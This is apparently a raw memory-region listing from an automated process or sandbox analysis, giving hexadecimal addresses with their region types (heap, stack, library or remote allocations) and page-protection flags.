page read and write
4F60000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
4F48000
trusted library allocation
page read and write
326B000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
2BF0000
remote allocation
page read and write
31C7000
trusted library allocation
page read and write
3B04000
trusted library allocation
page read and write
556B000
heap
page read and write
647000
heap
page read and write
41F000
heap
page read and write
31C7000
trusted library allocation
page read and write
841E000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
35D6000
heap
page read and write
26FE000
stack
page read and write | page guard
20C000
stack
page read and write
4F54000
trusted library allocation
page read and write
3151000
trusted library allocation
page read and write
2BA0000
trusted library allocation
page read and write
10000
heap
page read and write
9A0000
heap
page read and write
3536000
heap
page read and write
351B000
stack
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
2A1000
heap
page read and write
30BF000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
3C8000
heap
page read and write
296C000
stack
page read and write
28C4000
trusted library allocation
page read and write
180000
heap
page read and write
3551000
heap
page read and write
27F3000
trusted library allocation
page read and write
38E000
heap
page read and write
354D000
heap
page read and write
3B0D000
trusted library allocation
page read and write
404000
heap
page read and write
393000
heap
page read and write
2907000
trusted library allocation
page read and write
13122000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
299C000
stack
page read and write
2D0000
heap
page read and write
2904000
trusted library allocation
page read and write
2FEE000
stack
page read and write
2700000
trusted library allocation
page read and write
2BA7000
trusted library allocation
page read and write
4F48000
trusted library allocation
page read and write
3153000
trusted library allocation
page read and write
3005000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
10057000
unkown
page read and write
30BF000
trusted library allocation
page read and write
2B90000
trusted library allocation
page read and write
2B9D000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
3B0D000
trusted library allocation
page read and write
2DA0000
trusted library allocation
page read and write
3165000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
2E71000
trusted library allocation
page read and write
4FE000
stack
page read and write
2FD0000
trusted library allocation
page read and write
31C7000
trusted library allocation
page read and write
7FF000D2000
trusted library allocation
page execute and read and write
3539000
heap
page read and write
3190000
trusted library allocation
page read and write
10000000
unkown
page readonly
35D9000
heap
page read and write
2828000
trusted library allocation
page read and write
316E000
trusted library allocation
page read and write
377000
heap
page read and write
3592000
heap
page read and write
1DA0000
heap
page execute and read and write
30C2000
trusted library allocation
page read and write
10053000
unkown
page read and write
2EB0000
trusted library allocation
page read and write
1C0000
heap
page read and write
3B04000
trusted library allocation
page read and write
379D000
trusted library allocation
page read and write
48C000
heap
page read and write
326B000
trusted library allocation
page read and write
375E000
trusted library allocation
page read and write
35CA000
heap
page read and write
2C40000
heap
page execute and read and write
35D6000
heap
page read and write
5533000
heap
page read and write
4F54000
trusted library allocation
page read and write
3167000
trusted library allocation
page read and write
3563000
heap
page read and write
4F54000
trusted library allocation
page read and write
27E5000
trusted library allocation
page read and write
2D5000
heap
page read and write
2850000
trusted library allocation
page read and write
31C7000
trusted library allocation
page read and write
24C0000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
3254000
trusted library allocation
page read and write
355000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
4F48000
trusted library allocation
page read and write
406000
heap
page read and write
2CAF000
heap
page read and write
685000
trusted library allocation
page read and write
2ED0000
trusted library allocation
page read and write
3ACA000
stack
page read and write
3AFB000
trusted library allocation
page read and write
3B50000
trusted library allocation
page read and write
2044000
heap
page read and write
35AC000
heap
page read and write
3B4000
heap
page read and write
8EFE000
trusted library allocation
page read and write
406000
trusted library allocation
page read and write
2670000
trusted library allocation
page read and write
4E5000
trusted library allocation
page read and write
2B9D000
trusted library allocation
page read and write
20A0000
heap
page read and write
35D4000
heap
page read and write
8F4E000
trusted library allocation
page read and write
2F1E000
stack
page read and write
2BA7000
trusted library allocation
page read and write
260000
trusted library allocation
page read and write
33A1000
trusted library allocation
page execute
8CFE000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
39B9000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
369B000
trusted library allocation
page read and write
326B000
trusted library allocation
page read and write
7FF00260000
trusted library allocation
page read and write
2C7000
heap
page read and write
26D6000
trusted library allocation
page read and write
2125000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
354D000
heap
page read and write
31C0000
trusted library allocation
page read and write
378D000
trusted library allocation
page read and write
8EBE000
trusted library allocation
page read and write
3520000
heap
page read and write
FB000
stack
page read and write
10E000
heap
page read and write
7FF0024D000
trusted library allocation
page execute and read and write
2904000
trusted library allocation
page read and write
3193000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
3156000
trusted library allocation
page read and write
28C4000
trusted library allocation
page read and write
9D0000
heap
page read and write
5A9D000
heap
page read and write
35AC000
heap
page read and write
5A74000
heap
page read and write
380000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
2DB000
heap
page read and write
410000
heap
page read and write
4220000
heap
page read and write
2BA7000
trusted library allocation
page read and write
35B8000
heap
page read and write
3B0A000
trusted library allocation
page read and write
6D4000
heap
page read and write
755000
heap
page read and write
2570000
heap
page read and write
4F60000
trusted library allocation
page read and write
2B0000
heap
page read and write
282E000
stack
page read and write
7FF0001A000
trusted library allocation
page execute and read and write
2E67000
heap
page read and write
3551000
heap
page read and write
3570000
heap
page read and write
248000
heap
page read and write
5A84000
heap
page read and write
2670000
trusted library allocation
page read and write
282F000
stack
page read and write
3B04000
trusted library allocation
page read and write
3015000
trusted library allocation
page read and write
2890000
trusted library allocation
page read and write
2670000
trusted library allocation
page read and write
7FF00200000
trusted library allocation
page execute and read and write
359E000
heap
page read and write
30BF000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
2E7E000
stack
page read and write
3B0D000
trusted library allocation
page read and write
35C9000
heap
page read and write
40F000
heap
page read and write
2000000
trusted library allocation
page read and write
4F48000
trusted library allocation
page read and write
3572000
heap
page read and write
357C000
heap
page read and write
556C000
heap
page read and write
31C7000
trusted library allocation
page read and write
20000
heap
page read and write
2907000
trusted library allocation
page read and write
35D2000
heap
page read and write
29BA000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
3619000
heap
page read and write
912E000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
28C4000
trusted library allocation
page read and write
290E000
stack
page read and write
3B14000
trusted library allocation
page read and write
35CF000
heap
page read and write
2907000
trusted library allocation
page read and write
6ED000
heap
page read and write
23C0000
heap
page read and write
1F30000
heap
page read and write
28A0000
trusted library allocation
page read and write
4F48000
trusted library allocation
page read and write
389000
heap
page read and write
7FF00112000
trusted library allocation
page execute and read and write
2CF5000
heap
page read and write
823E000
trusted library allocation
page read and write
3672000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
35D4000
heap
page read and write
2904000
trusted library allocation
page read and write
3060000
trusted library allocation
page read and write
781000
heap
page read and write
28C0000
trusted library allocation
page read and write
4A0000
trusted library allocation
page read and write
24E0000
trusted library allocation
page read and write
87EE000
trusted library allocation
page read and write
5520000
heap
page read and write
2A8000
heap
page read and write
2B95000
trusted library allocation
page read and write
3B0D000
trusted library allocation
page read and write
4F48000
trusted library allocation
page read and write
10053000
unkown
page read and write
28C4000
trusted library allocation
page read and write
46E000
heap
page read and write
3B04000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
2F60000
trusted library allocation
page read and write
2F9E000
stack
page read and write
4F54000
trusted library allocation
page read and write
326B000
trusted library allocation
page read and write
7FF00150000
trusted library allocation
page read and write
5ACA000
heap
page read and write
298000
heap
page read and write
28C4000
trusted library allocation
page read and write
26B0000
trusted library allocation
page read and write
920000
heap
page read and write
3AFB000
trusted library allocation
page read and write
3167000
trusted library allocation
page read and write
727000
heap
page read and write
2DA0000
trusted library allocation
page read and write
3145000
trusted library allocation
page read and write
418000
heap
page read and write
2F90000
trusted library allocation
page read and write
31D7000
trusted library allocation
page read and write
3619000
heap
page read and write
4F54000
trusted library allocation
page read and write
2840000
heap
page read and write
5A79000
heap
page read and write
2670000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
356000
trusted library allocation
page read and write
912E000
trusted library allocation
page read and write
326B000
trusted library allocation
page read and write
2FCE000
stack
page read and write
8E6E000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
377D000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
326B000
trusted library allocation
page read and write
316000
heap
page read and write
2BA7000
trusted library allocation
page read and write
2490000
trusted library allocation
page read and write
3176000
trusted library allocation
page read and write
2DC0000
trusted library allocation
page read and write
2ECE000
stack
page read and write
490000
heap
page read and write
73D000
heap
page read and write
AC000
stack
page read and write
28F0000
trusted library allocation
page read and write
35D2000
heap
page read and write
1005A000
unkown
page readonly
3563000
heap
page read and write
316B000
trusted library allocation
page read and write
2EF5000
trusted library allocation
page read and write
D0000
heap
page read and write
2410000
trusted library allocation
page read and write
412000
heap
page read and write
426000
heap
page read and write
2904000
trusted library allocation
page read and write
10057000
unkown
page read and write
3577000
heap
page read and write
678000
heap
page read and write
836E000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
2BA8000
trusted library allocation
page read and write
354E000
heap
page read and write
420000
heap
page read and write
851E000
trusted library allocation
page read and write
3160000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
5551000
heap
page read and write
397000
heap
page read and write
1E6000
trusted library allocation
page read and write
25C0000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
410000
heap
page read and write
6E5000
trusted library allocation
page read and write
27C5000
trusted library allocation
page read and write
3761000
trusted library allocation
page read and write
10057000
unkown
page read and write
2670000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
3B0D000
trusted library allocation
page read and write
3060000
trusted library allocation
page read and write
3175000
trusted library allocation
page read and write
28C4000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
317A000
trusted library allocation
page read and write
2F90000
trusted library allocation
page read and write
2BE0000
trusted library allocation
page read and write
10D000
heap
page read and write
455000
trusted library allocation
page read and write
3B0A000
trusted library allocation
page read and write
1C6B0000
heap
page read and write
5533000
heap
page read and write
2A0000
trusted library allocation
page read and write
3B0A000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
35CD000
heap
page read and write
8DCE000
trusted library allocation
page read and write
318E000
trusted library allocation
page read and write
279E000
stack
page read and write
2600000
trusted library allocation
page read and write
343000
heap
page read and write
2859000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
2B9D000
trusted library allocation
page read and write
24A0000
heap
page read and write
35D6000
heap
page read and write
2FF0000
trusted library allocation
page read and write
554B000
heap
page read and write
2907000
trusted library allocation
page read and write
2890000
trusted library allocation
page read and write
10046000
unkown
page readonly
5AA9000
heap
page read and write
3163000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
2BF0000
remote allocation
page read and write
2FD000
heap
page read and write
2B2000
heap
page read and write
2E6000
heap
page read and write
886E000
trusted library allocation
page read and write
3015000
trusted library allocation
page read and write
4E6000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
28C6000
trusted library allocation
page read and write
3B0A000
trusted library allocation
page read and write
445000
trusted library allocation
page read and write
7FF00020000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
35BA000
heap
page read and write
2100000
trusted library allocation
page read and write
3B3E000
trusted library allocation
page read and write
3F8000
heap
page read and write
3015000
trusted library allocation
page read and write
3B04000
trusted library allocation
page read and write
360000
heap
page read and write
28F0000
trusted library allocation
page read and write
5A79000
heap
page read and write
4F48000
trusted library allocation
page read and write
7FF001F0000
trusted library allocation
page read and write
3B0A000
trusted library allocation
page read and write
14B000
stack
page read and write
2904000
trusted library allocation
page read and write
10000
heap
page read and write
326B000
trusted library allocation
page read and write
3B0000
heap
page read and write
3AFB000
trusted library allocation
page read and write
3185000
trusted library allocation
page read and write
58C0000
heap
page read and write
3AFB000
trusted library allocation
page read and write
1005A000
unkown
page readonly
10053000
unkown
page read and write
1F0000
trusted library allocation
page read and write
35D6000
heap
page read and write
3974000
trusted library allocation
page read and write
246C000
stack
page read and write
A10000
heap
page read and write
823E000
trusted library allocation
page read and write
28B5000
unkown
page read and write
326E000
trusted library allocation
page read and write
322A000
trusted library allocation
page read and write
333E000
trusted library allocation
page read and write
3015000
trusted library allocation
page read and write
3B0A000
trusted library allocation
page read and write
3167000
trusted library allocation
page read and write
10000000
unkown
page readonly
28F0000
trusted library allocation
page read and write
3167000
trusted library allocation
page read and write
5A72000
heap
page read and write
353C000
heap
page read and write
3060000
trusted library allocation
page read and write
294C000
stack
page read and write
2865000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
40C000
heap
page read and write
359E000
heap
page read and write
22E0000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
48D000
heap
page read and write
2904000
trusted library allocation
page read and write
37B3000
trusted library allocation
page read and write
8CFE000
trusted library allocation
page read and write
2BA7000
trusted library allocation
page read and write
22B0000
trusted library allocation
page read and write
315B000
trusted library allocation
page read and write
317A000
trusted library allocation
page read and write
7FF000EA000
trusted library allocation
page execute and read and write
35D2000
heap
page read and write
24E4000
heap
page read and write
2B99000
trusted library allocation
page read and write
3167000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
31D0000
trusted library allocation
page read and write
33A4000
trusted library allocation
page execute
2D90000
trusted library allocation
page read and write
4F20000
trusted library allocation
page read and write
33E0000
trusted library allocation
page read and write
407000
heap
page read and write
28F0000
trusted library allocation
page read and write
6E6000
trusted library allocation
page read and write
3155000
trusted library allocation
page read and write
4F48000
trusted library allocation
page read and write
8CFE000
trusted library allocation
page read and write
10057000
unkown
page read and write
1FA000
stack
page read and write
352C000
heap
page read and write
39B9000
trusted library allocation
page read and write
35D2000
heap
page read and write
2BA7000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
2062000
heap
page read and write
2B9E000
trusted library allocation
page read and write
2BAC000
trusted library allocation
page read and write
3167000
trusted library allocation
page read and write
4F48000
trusted library allocation
page read and write
2BA1000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
3167000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
3976000
trusted library allocation
page read and write
10046000
unkown
page readonly
3644000
heap
page read and write
320B000
trusted library allocation
page read and write
31E5000
trusted library allocation
page read and write
495000
trusted library allocation
page read and write
3C29000
trusted library allocation
page read and write
2410000
trusted library allocation
page read and write
2F8E000
stack
page read and write
48F000
stack
page read and write
3E2000
heap
page read and write
28F0000
trusted library allocation
page read and write
440C000
stack
page read and write
3167000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
2670000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
200000
heap
page read and write
3167000
trusted library allocation
page read and write
3B18000
trusted library allocation
page read and write
45C000
stack
page read and write
8D1E000
trusted library allocation
page read and write
3B0A000
trusted library allocation
page read and write
26D5000
trusted library allocation
page read and write
419000
heap
page read and write
3970000
trusted library allocation
page read and write
7FF000E0000
trusted library allocation
page read and write
2D90000
trusted library allocation
page read and write
75D000
heap
page read and write
2400000
heap
page read and write
27A000
heap
page read and write
3E2000
heap
page read and write
400000
heap
page read and write
1BB0000
heap
page read and write
31C7000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
2660000
heap
page read and write
2BD0000
trusted library allocation
page read and write
24C0000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
3B0A000
trusted library allocation
page read and write
48D000
heap
page read and write
3B1C000
trusted library allocation
page read and write
2DEE000
stack
page read and write
5A68000
heap
page read and write
170000
heap
page read and write
90AE000
trusted library allocation
page read and write
3B16000
trusted library allocation
page read and write
10000
heap
page read and write
2A7000
heap
page read and write
2670000
trusted library allocation
page read and write
326F000
trusted library allocation
page read and write
2CE3000
heap
page read and write
1005A000
unkown
page readonly
2BAB000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
2B95000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
48D000
heap
page read and write
5A72000
heap
page read and write
3391000
trusted library allocation
page read and write
2855000
trusted library allocation
page read and write
87EE000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
2670000
trusted library allocation
page read and write
31C7000
trusted library allocation
page read and write
12C000
stack
page read and write
3B0A000
trusted library allocation
page read and write
7FF00250000
trusted library allocation
page execute and read and write
2907000
trusted library allocation
page read and write
8DCE000
trusted library allocation
page read and write
7FF00210000
trusted library allocation
page read and write
2B64000
trusted library section
page readonly
2B9D000
trusted library allocation
page read and write
295E000
stack
page read and write
3B0A000
trusted library allocation
page read and write
30AC000
trusted library allocation
page read and write
326B000
trusted library allocation
page read and write
2FD0000
trusted library allocation
page read and write
317A000
trusted library allocation
page read and write
3167000
trusted library allocation
page read and write
3152000
trusted library allocation
page read and write
2892000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
4F48000
trusted library allocation
page read and write
10046000
unkown
page readonly
274F000
stack
page read and write
3015000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
10053000
unkown
page read and write
3B51000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
3B04000
trusted library allocation
page read and write
2830000
trusted library allocation
page read and write
2670000
trusted library allocation
page read and write
6DC000
heap
page read and write
2725000
trusted library allocation
page read and write
46A000
heap
page read and write
35D6000
heap
page read and write
886E000
trusted library allocation
page read and write
325B000
trusted library allocation
page read and write
31C7000
trusted library allocation
page read and write
7FF00160000
trusted library allocation
page execute and read and write
28C5000
trusted library allocation
page read and write
35AC000
heap
page read and write
29B0000
trusted library allocation
page read and write
2E6E000
stack
page read and write
2E70000
trusted library allocation
page read and write
2BA7000
trusted library allocation
page read and write
635000
trusted library allocation
page read and write
5A68000
heap
page read and write
3400000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
1BAB0000
heap
page read and write
8FBE000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
2866000
trusted library allocation
page read and write
3B4000
heap
page read and write
30B2000
trusted library allocation
page read and write
401000
heap
page read and write
390000
heap
page read and write
326B000
trusted library allocation
page read and write
35B8000
heap
page read and write
35C1000
heap
page read and write
30A0000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
35AA000
trusted library allocation
page read and write
31C7000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
3085000
trusted library allocation
page read and write
24D0000
heap
page read and write
4F48000
trusted library allocation
page read and write
130C0000
trusted library allocation
page read and write
356000
heap
page read and write
35BC000
heap
page read and write
3738000
trusted library allocation
page read and write
3B0A000
trusted library allocation
page read and write
309C000
trusted library allocation
page read and write
5A74000
heap
page read and write
7FF00240000
trusted library allocation
page execute and read and write
835E000
trusted library allocation
page read and write
39B9000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
3619000
heap
page read and write
3B0A000
trusted library allocation
page read and write
886E000
trusted library allocation
page read and write
326B000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
2841000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
10D000
heap
page read and write
2B9A000
trusted library allocation
page read and write
35BC000
heap
page read and write
3B04000
trusted library allocation
page read and write
7EC000
heap
page read and write
811E000
trusted library allocation
page read and write
5A97000
heap
page read and write
31C7000
trusted library allocation
page read and write
353D000
heap
page read and write
30BF000
trusted library allocation
page read and write
251000
stack
page read and write
10000000
unkown
page readonly
12E9C000
trusted library allocation
page read and write
260000
heap
page read and write
315A000
trusted library allocation
page read and write
1AED0000
trusted library allocation
page read and write
3433000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
41E000
heap
page read and write
3B04000
trusted library allocation
page read and write
409B000
stack
page read and write
2DC0000
trusted library allocation
page read and write
3015000
trusted library allocation
page read and write
35D9000
heap
page read and write
2BE000
heap
page read and write
414000
heap
page read and write
320000
heap
page read and write
24D000
heap
page read and write
2670000
trusted library allocation
page read and write
220000
heap
page read and write
3B0D000
trusted library allocation
page read and write
359E000
heap
page read and write
3B0A000
trusted library allocation
page read and write
2B2000
heap
page read and write
4F60000
trusted library allocation
page read and write
1CA10000
heap
page read and write
1005A000
unkown
page readonly
3168000
trusted library allocation
page read and write
326B000
trusted library allocation
page read and write
2910000
trusted library allocation
page read and write
46E000
heap
page read and write
250000
heap
page read and write
3167000
trusted library allocation
page read and write
3FA000
heap
page read and write
12E75000
trusted library allocation
page read and write
3B04000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
28B5000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
2856000
trusted library allocation
page read and write
397000
heap
page read and write
4F20000
trusted library allocation
page read and write
4F48000
trusted library allocation
page read and write
23C0000
trusted library allocation
page read and write
317A000
trusted library allocation
page read and write
11A000
stack
page read and write
3B0D000
trusted library allocation
page read and write
330000
trusted library allocation
page read and write
26FF000
stack
page read and write
3110000
trusted library allocation
page execute
27C0000
trusted library allocation
page read and write
31FF000
trusted library allocation
page read and write
AC000
stack
page read and write
427000
heap
page read and write
2907000
trusted library allocation
page read and write
39B9000
trusted library allocation
page read and write
90CE000
trusted library allocation
page read and write
29B4000
trusted library allocation
page read and write
6C0000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
3552000
heap
page read and write
1B5000
stack
page read and write | page guard
1E5000
trusted library allocation
page read and write
7FF001D0000
trusted library allocation
page execute and read and write
2FC000
heap
page read and write
324A000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
3208000
trusted library allocation
page read and write
29AD000
stack
page read and write
3015000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
326B000
trusted library allocation
page read and write
3167000
trusted library allocation
page read and write
3C22000
trusted library allocation
page read and write
2C00000
heap
page execute and read and write
2904000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
7FF00012000
trusted library allocation
page execute and read and write
3015000
trusted library allocation
page read and write
326B000
trusted library allocation
page read and write
326B000
trusted library allocation
page read and write
3253000
trusted library allocation
page read and write
4F48000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
2E4E000
stack
page read and write
28C4000
trusted library allocation
page read and write
2DA0000
trusted library allocation
page read and write
31C7000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
2BAE000
trusted library allocation
page read and write
10A000
stack
page read and write
2F10000
trusted library allocation
page read and write
30DB000
trusted library allocation
page read and write
6E8000
heap
page read and write
10000000
unkown
page readonly
3640000
heap
page read and write
30BF000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
3015000
trusted library allocation
page read and write
8CEE000
trusted library allocation
page read and write
3205000
trusted library allocation
page read and write
15C000
stack
page read and write
2904000
trusted library allocation
page read and write
377000
heap
page read and write
4F48000
trusted library allocation
page read and write
28C4000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
321B000
trusted library allocation
page read and write
2BA7000
trusted library allocation
page read and write
10000000
unkown
page readonly
BC000
stack
page read and write
5566000
heap
page read and write
29D000
heap
page read and write
2904000
trusted library allocation
page read and write
456000
trusted library allocation
page read and write
35B8000
heap
page read and write
10000
heap
page read and write
2F4E000
stack
page read and write
2B99000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
552A000
heap
page read and write
10046000
unkown
page readonly
2670000
trusted library allocation
page read and write
27A000
heap
page read and write
902E000
trusted library allocation
page read and write
28B4000
trusted library allocation
page read and write
23E5000
trusted library allocation
page read and write
27BE000
stack
page read and write
313000
heap
page read and write
3B0D000
trusted library allocation
page read and write
4B8000
heap
page read and write
2BA7000
trusted library allocation
page read and write
46A000
heap
page read and write
326B000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
316F000
trusted library allocation
page read and write
326B000
trusted library allocation
page read and write
317A000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
416000
heap
page read and write
58C9000
heap
page read and write
330E000
trusted library allocation
page read and write
7FF00280000
trusted library allocation
page execute and read and write
3150000
trusted library allocation
page read and write
8F2E000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
10053000
unkown
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
315F000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
2BA7000
trusted library allocation
page read and write
40F000
heap
page read and write
39B9000
trusted library allocation
page read and write
316F000
trusted library allocation
page read and write
2185000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
1C89C000
stack
page read and write
30BF000
trusted library allocation
page read and write
36F0000
heap
page read and write
24B5000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
37A0000
trusted library allocation
page read and write
3015000
trusted library allocation
page read and write
7BE000
heap
page read and write
3188000
trusted library allocation
page read and write
8E2E000
trusted library allocation
page read and write
7FF001C0000
trusted library allocation
page read and write
1ED000
stack
page read and write
2DE6000
trusted library allocation
page read and write
295000
heap
page read and write
2BAF000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
28B4000
trusted library allocation
page read and write
6B7000
heap
page read and write
3060000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
1BC7E000
stack
page read and write
30BF000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
87DE000
trusted library allocation
page read and write
2B97000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
317F000
trusted library allocation
page read and write
1005A000
unkown
page readonly
2904000
trusted library allocation
page read and write
35D2000
heap
page read and write
30BC000
trusted library allocation
page read and write
398000
heap
page read and write
30D000
heap
page read and write
2907000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
1C81E000
stack
page read and write
4F48000
trusted library allocation
page read and write
5532000
heap
page read and write
2BA7000
trusted library allocation
page read and write
5AA9000
heap
page read and write
38D000
heap
page read and write
2FF0000
trusted library allocation
page read and write
326B000
trusted library allocation
page read and write
39B9000
trusted library allocation
page read and write
5A79000
heap
page read and write
2880000
trusted library allocation
page read and write
30D1000
trusted library allocation
page read and write
354D000
heap
page read and write
554F000
heap
page read and write
27C6000
trusted library allocation
page read and write
3C9C000
stack
page read and write
354F000
heap
page read and write
31D0000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
2EDF000
stack
page read and write
2670000
trusted library allocation
page read and write
28C4000
trusted library allocation
page read and write
6AA000
heap
page read and write
2BEB000
heap
page read and write
811E000
trusted library allocation
page read and write
2A50000
heap
page read and write
32D000
heap
page read and write
2B99000
trusted library allocation
page read and write
3B0D000
trusted library allocation
page read and write
2670000
trusted library allocation
page read and write
2BA7000
trusted library allocation
page read and write
4B0000
heap
page read and write
75A000
heap
page read and write
3AFB000
trusted library allocation
page read and write
46A000
heap
page read and write
2726000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
35D4000
heap
page read and write
3B51000
trusted library allocation
page read and write
10000
heap
page read and write
2670000
trusted library allocation
page read and write
5565000
heap
page read and write
389000
heap
page read and write
7FF00270000
trusted library allocation
page execute and read and write
2E5E000
stack
page read and write
313000
heap
page read and write
88BE000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
2831000
trusted library allocation
page read and write
366000
trusted library allocation
page read and write
39CA000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
2ECF000
trusted library allocation
page read and write
3556000
heap
page read and write
326B000
trusted library allocation
page read and write
2BE4000
trusted library allocation
page read and write
2A1000
heap
page read and write
30BF000
trusted library allocation
page read and write
3555000
heap
page read and write
334A000
trusted library allocation
page read and write
3556000
heap
page read and write
326B000
trusted library allocation
page read and write
3767000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
886E000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
23D0000
heap
page read and write
3258000
trusted library allocation
page read and write
377000
heap
page read and write
2818000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
5A55000
heap
page read and write
2126000
trusted library allocation
page read and write
5A79000
heap
page read and write
361A000
heap
page read and write
8E6E000
trusted library allocation
page read and write
470000
heap
page read and write
284000
heap
page read and write
4F54000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
389000
heap
page read and write
3B30000
trusted library allocation
page read and write
1B6000
stack
page read and write
31EB000
trusted library allocation
page read and write
2B9B000
trusted library allocation
page read and write
326B000
trusted library allocation
page read and write
71A000
heap
page read and write
316D000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
10D000
heap
page read and write
120000
heap
page read and write
2E70000
trusted library allocation
page read and write
3561000
heap
page read and write
35CF000
heap
page read and write
2904000
trusted library allocation
page read and write
3152000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
2670000
trusted library allocation
page read and write
40D000
heap
page read and write
210D000
stack
page read and write
3764000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
30DE000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
1B0000
heap
page read and write
2907000
trusted library allocation
page read and write
7B1000
heap
page read and write
3161000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
324000
heap
page read and write
8CFE000
trusted library allocation
page read and write
35D9000
heap
page read and write
319E000
trusted library allocation
page read and write
3C0000
trusted library allocation
page read and write
2130000
